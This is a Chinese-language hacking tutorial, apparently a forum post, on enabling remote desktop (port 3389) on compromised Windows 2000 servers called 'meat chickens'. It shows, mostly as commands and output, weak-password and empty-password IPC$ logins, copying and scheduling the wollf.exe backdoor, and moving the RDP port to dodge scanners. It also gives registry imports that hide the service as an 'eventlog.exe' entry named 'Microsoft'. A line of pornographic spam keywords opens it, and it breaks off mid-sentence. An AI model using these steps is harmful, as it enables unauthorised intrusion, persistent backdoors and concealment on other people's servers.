国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

==========================================================================================
第一種方法：
==========================================================================================
使用的工具:
1:ipcscan掃描器
2:終端服務(wù)連接工具xpts.exe(WIN 2000/XP 終端連接程序. 內(nèi)附有COPY 文件的補(bǔ)丁. 格式 IPort )
3:開終端的腳本rots.vbs(灰色軌跡zzzevazzz的作品)
4:cscript (在system32文件夾下;98操作系統(tǒng)可能沒有
二:步驟:
1:用ipcscan掃描弱口令(你們可以自己掃,我也掃到一些弱口令主機(jī).演實(shí)時(shí)間我在論壇上再發(fā))

2:用rots.vbs開啟終端服務(wù)

說明 cscript ROTS.vbs <目標(biāo)IP> <用戶名> <密碼> [服務(wù)端口] [自動(dòng)重起選項(xiàng)]

格式 cscript.exe rots.vbs ip user userpass port /r
或者 cscript.exe rots.vbs ip user userpass port /fr

三:常見問題:

1:腳本會(huì)判斷目標(biāo)系統(tǒng)類型,如果不是server及以上版本,就會(huì)提示你是否要取消。因?yàn)閜ro版不能安裝終端服務(wù).如果你確信腳本判斷錯(cuò)誤,就繼續(xù)安裝好了.

2:可能會(huì)出現(xiàn):Conneting 202.202.202.202 ....Error0x80070776 .Error description: 沒有發(fā)現(xiàn)指定的此對(duì)象導(dǎo)出者,這個(gè)還是放棄吧.

3:可能會(huì)連接不上,請(qǐng)用這個(gè)格式127.0.0.1:1818 1818是剛才開的端口.

==========================================================================================
第二種方法：
==========================================================================================
進(jìn)入后：TELNET上去！

c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
或者！
c:\>echo [Components] > d:\wawa
c:\>echo TSEnable = on >> d:\wawa
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q
等會(huì)自動(dòng)啟后就OK

或者：
在本地利用DOS命令edit建立.bat后綴批處理文件（文件名隨意） echo [Components] > c:\sql

echo TSEnable = on >>

c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q

net use \\ip地址\ipc$ 密碼 /user:用戶名（一般默認(rèn):administrator)

利用at time 獲取對(duì)方服務(wù)器時(shí)間。

copy 路徑:\xxx.bat \\ip地址\$c:\winnt

at time 00:00:00 xxx.bat

服務(wù)器執(zhí)行命令后，服務(wù)器將重新啟動(dòng)，利用3389登陸就OK了！
==========================================================================================

第三種方法：
==========================================================================================
進(jìn)入后,再次檢查終端組件是否安裝:
c:\>query user
這個(gè)工具需要安裝終端服務(wù).

這樣就進(jìn)一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運(yùn)行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.

好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個(gè)文件 3,770 字節(jié)
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個(gè)文件 42,768 字節(jié)
-----------------------------------------------------
c:\>echo [Components] > c:\rock
c:\>echo TSEnable = on >> c:\rock
//這是建立無人參與的安裝參數(shù)
c:\>type c:\rock
[Components]
TSEnable = on
//檢查參數(shù)文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q
-----------------------------------------------------

這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數(shù),主機(jī)在安裝完后自動(dòng)重起.
如若加了/R參數(shù)主機(jī)就不會(huì)重起.

如果一切正常的話,幾分鐘后對(duì)方主機(jī)將會(huì)離線,當(dāng)它重新回來時(shí),
3389終端服務(wù)就已經(jīng)開啟.你就可以連上去了.

問題和建議:

A 在安裝過程中,不使用/R,有時(shí)主機(jī)也不會(huì)重起,你就要手動(dòng)重起他,但在使用諸如:iisreset /reboot命令時(shí),對(duì)方
的屏幕會(huì)出現(xiàn)個(gè)對(duì)話框,寫著誰引起的這次啟動(dòng),離重起還有多少秒.

B 一次不行可以再試一次,在實(shí)際中很有作用.

C 在輸入sysocmgr命令開始安裝時(shí),一定不要把命令參數(shù)輸錯(cuò),那會(huì)在對(duì)方出現(xiàn)一個(gè)大的對(duì)話框,是sysocmgr的幫助,很是顯眼,
而且要求確定.在你的屏幕上是不會(huì)有任何反應(yīng)的,你不會(huì)知道出錯(cuò)，所以會(huì)有B的建議.

==========================================================================================
第四種方法：
==========================================================================================

C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------連接成功！
命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷貝wollf.exe到目標(biāo)計(jì)算機(jī)的admin$目錄
已復(fù)制 1 個(gè)文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷貝hbulot.exe到目標(biāo)計(jì)算機(jī)的admin$目錄
已復(fù)制 1 個(gè)文件。

C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的當(dāng)前時(shí)間是 2002/12/1 上午 06:37
命令成功完成。

C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一項(xiàng)作業(yè)，其作業(yè) ID = 1--指定wollf.exe在06:39運(yùn)行
------------------------------------------------------------------------------------------
說明：
wollf.exe是一個(gè)后門程序，很多高手都喜歡nc或者winshell，不過我對(duì)他情有獨(dú)鐘！在這里我只介紹與本文內(nèi)

容有關(guān)的命令參數(shù)，它的高級(jí)用法不做補(bǔ)充。
hbulot.exe是用于開啟3389服務(wù)，如果不是server及以上版本，就不要運(yùn)行了。因?yàn)閜ro版不能安裝終端服務(wù)。
2分鐘后......

------------------------------------------------------------------------------------------
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
說明：
使用wollf連接時(shí)要注意wollf.exe要在當(dāng)前目錄，它的連接命令格式：wollf -connect IP 7614
7614是wollf開放的端口。如果顯示如上，說明你已經(jīng)連接成功，并具有管理員administrator權(quán)限。

------------------------------------------------------------------------------------------
[server@D:\WINNT\system32]#dos

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
說明：
輸入dos,你就會(huì)進(jìn)入目標(biāo)機(jī)的cmd下，這時(shí)同樣具有administrator權(quán)限。

------------------------------------------------------------------------------------------
D:\WINNT\system32>cd..
cd..

D:\WINNT>dir h*.*
dir h*.*
驅(qū)動(dòng)器 D 中的卷沒有標(biāo)簽。
卷的序列號(hào)是 1CE5-2615

D:\WINNT 的目錄

2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 個(gè)文件 35,328 字節(jié)
1 個(gè)目錄 9,049,604,096 可用字節(jié)

D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
說明：
因?yàn)槲覀儼袶BULOT.exe放到目標(biāo)機(jī)的admin$下的，所以先找到它，以上是文件的存放位置。

==========================================================================================
D:\WINNT>exit
exit

Command "DOS" succeed.

[server@D:\WINNT\system32]#reboot

Command "REBOOT" succeed.

[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
說明：
由dos退到wollf的連接模式下用exit命令，HBULOT.exe運(yùn)行后需重新啟動(dòng)方可生效，這里wollf自帶的REBOOT
命令，執(zhí)行過在5秒后你就會(huì)失去連接。啟動(dòng)完畢后檢查一下3389端口是否開放，方法很多，superscan3掃一下

。這時(shí)候你就可以登陸了。如果沒有開放3389那就不是server及以上版本，就不要運(yùn)行了。因?yàn)閜ro版不能安裝

終端服務(wù)。

到這里，你已經(jīng)擁有3389肉雞了！但是會(huì)不會(huì)被別的入侵者發(fā)現(xiàn)呢？下面所教的就是怎么讓3389只為你服務(wù)！

我們現(xiàn)在使用的3389登陸器有兩種版本，一種是2000/98，一種是XP。二者區(qū)別呢？前者使用的默認(rèn)端口3389對(duì)

目標(biāo)，后者默認(rèn)的也是3389端口，但是它還支持別的端口進(jìn)行連接！所以呢......我們來修改3389的連接端口

來躲過普通掃描器的掃描！修改方法如下：
修改服務(wù)器端的端口設(shè)置 ，注冊(cè)表有2個(gè)地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值，默認(rèn)是3389，修改成所希望的端口，比如1314
第二個(gè)地方：
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]　
PortNumber值，默認(rèn)是3389，修改成所希望的端口，比如1314
現(xiàn)在這樣就可以了。重啟系統(tǒng)吧。
注意：事實(shí)上，只修改第二處也是可以的。另外，第二處的標(biāo)準(zhǔn)聯(lián)結(jié)應(yīng)該是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具體的某個(gè)RDP-TCP連結(jié)。
重啟過后，看看端口有沒有改。
小技巧：修改注冊(cè)表鍵值時(shí)，先選擇10進(jìn)制，輸入你希望的端口數(shù)值，再選擇16進(jìn)制，系統(tǒng)會(huì)自動(dòng)轉(zhuǎn)換。

==========================================================================================
第五種方法：
==========================================================================================

一.原理性基本安裝
1.將如下注冊(cè)表鍵值導(dǎo)入 "肉機(jī)" 的注冊(cè)表中:

-------------

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

-----------
2.重新起動(dòng)"肉機(jī)"。

3.使用本地的3398客戶端，連接 "肉機(jī)" .

4.優(yōu)(缺)點(diǎn):

A."肉機(jī)"中 "控制面板-->添加/刪除程序-->添加/刪除 Windows 組件-->終端服務(wù)" 仍然處于未安裝狀態(tài).
B."肉機(jī)"中 "開始-->程序-->管理工具" 沒有任何變動(dòng).
C."肉機(jī)"中 "開始-->程序-->管理工具-->服務(wù)-->Terminal Services" 變?yōu)?"已起動(dòng)" 和"自動(dòng)".
D."肉機(jī)"中 "Windows 任務(wù)管理器-->進(jìn)程" 內(nèi),增加 "Termsrv.exe".

5.與"sysocmgr /iysoc.inf /u:u.txt /q" 的比較:

A."肉機(jī)"中 "控制面板-->添加/刪除程序-->添加/刪除 Windows 組件-->終端服務(wù)" 處于已安裝狀態(tài).
B."肉機(jī)"中 "開始-->程序-->管理工具" 增加 "終端服務(wù)管理器","終端服務(wù)配置" 和 "終端服務(wù)客戶端生成器".
C."肉機(jī)"中 "開始-->程序-->管理工具-->服務(wù)-->Terminal Services" 變?yōu)?"已起動(dòng)" 和"自動(dòng)".
D."肉機(jī)"中 "Windows 任務(wù)管理器-->進(jìn)程" 內(nèi),增加 "Termsrv.exe".
E.需要拷貝幾兆的文件到"肉機(jī)"中.

二.拋磚引玉性"隱蔽"安裝:

1.將"肉機(jī)"中 "c:\winnt\system32\termsrv.exe" 文件作一備份,命名為"eventlog.exe",仍將其放入目錄 "c:\winnt\system32\"

2.將如下注冊(cè)表鍵值導(dǎo)入 "肉機(jī)" 的注冊(cè)表中:

------------
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ShutdownWithoutLogon"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
"EnableAdminTSRemote"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
"Start"=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
"Hotkey"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"

---------------

3.重新起動(dòng)"肉機(jī)"。

4.使用本地的3398客戶端，連接“肉機(jī)”。

5.優(yōu)(缺)點(diǎn):

A."肉機(jī)"中 "控制面板-->添加/刪除程序-->添加/刪除 Windows 組件-->終端服務(wù)" 仍然處于未安裝狀態(tài).
B."肉機(jī)"中 "開始-->程序-->管理工具" 沒有任何變動(dòng).
C."肉機(jī)"中 "開始-->程序-->管理工具-->服務(wù)-->Terminal Services" 沒有變化,保持原始狀態(tài).
D."肉機(jī)"中 "開始-->程序-->管理工具-->服務(wù)" 增加 "Microsoft"
E."肉機(jī)"中 "Windows 任務(wù)管理器-->進(jìn)程" 內(nèi),增加 "eventlog.exe".

三.理論簡(jiǎn)介

如此簡(jiǎn)單? 只修改注冊(cè)表? 不需要拷貝W2k源文件?

讓我們從一條命令行語句說起,這條語句是: "sysocmgr /iysoc.inf /u:u.txt /q" . 其中 u.txt 如下:
-------------
[Components]
TsEnable = on
-------------

首先認(rèn)識(shí) "sysoc.inf"."sysoc.inf" 是安裝信息文件,位于 "c:\winnt\inf". 打開它,在 "[Components]" 節(jié),找到與 "終端服務(wù)" 有關(guān)的條目:

"TerminalServices=TsOc.dll, HydraOc, TsOc.inf,,2"

這里引出另外一個(gè)安裝信息文件: "TsOc.inf". 這個(gè)文件同樣位于 "c:\winnt\inf".

打開這個(gè)文件,你會(huì)發(fā)現(xiàn),如同 windows 環(huán)境下的軟件安裝, "終端服務(wù)" 的安裝, 也主要由三個(gè)部分: 拷貝源文件,注冊(cè) DLL 以及修改注冊(cè)表.

在 [TerminalServices.FreshInstall] 節(jié) 和 "File Sections" 部分,你會(huì)發(fā)現(xiàn) "終端服務(wù)" 所需的系統(tǒng)文件,DLL 和驅(qū)動(dòng), 隨同 W2k 的初始安裝,都已安然就位.

為什么 "終端服務(wù)" 的常規(guī)安裝和命令行安裝都需要拷貝W2k源文件? 事實(shí)上,所拷貝的是"終端服務(wù)"客戶端軟件,既 "開始-->程序-->管理工具-->終端服務(wù)客戶端生成器" 生成客戶軟盤需要的文件.

各位 "黑友" 提供的包或工具,里面包括的W2k源文件,都是 "tsc32" 打頭的. 關(guān)連 "TsOc.inf" 的 "File Sections" 部分和另外一個(gè)文件 "c:\winnt\inf\layout.inf",你將會(huì)得到證實(shí).

"終端服務(wù)"的安裝,需要注冊(cè)倆個(gè) "DLL". 這倆個(gè) "DLL" 同樣早早就住在系統(tǒng)里,想必它們一定也有了身份證.

"TsOc.inf" 文件一半的內(nèi)容是關(guān)于修改注冊(cè)表. 但"終端服務(wù)" 需要的"Reg.AddToFreshInstall, Reg.AddTo50, Reg.AddTo40" 都是在系統(tǒng)安裝時(shí)注冊(cè)過的.

我們回頭看一下那個(gè)命令行語句, "/u:" 參數(shù)后面的無人職守安裝信息文件 "u.txt". "TsEnable = on" ?

"TsOc.inf" 文件 [Optional Components] 節(jié)中有三個(gè)選項(xiàng), "TerminalServices", "TSEnable" ,"TSClients".

"TerminalServices" 如上所述,在系統(tǒng)初始安裝時(shí),已經(jīng)就序. "TSClients" 與 "終端服務(wù)" 沒有直接的關(guān)系.

我們?cè)?"TsOc.inf" 找到 "[TsEnable]" 節(jié). 此節(jié)中有用的信息只有一條 "ToggleOnSection = TerminalServices.ToggleOn". 再轉(zhuǎn)到 [TerminalServices.ToggleOn] 節(jié).

[TerminalServices.ToggleOn] 節(jié)告訴我們,下一站是 "Reg.ToggleOn", 沿著這個(gè)線索,我們來到 [Reg.ToggleOn], 你看到什么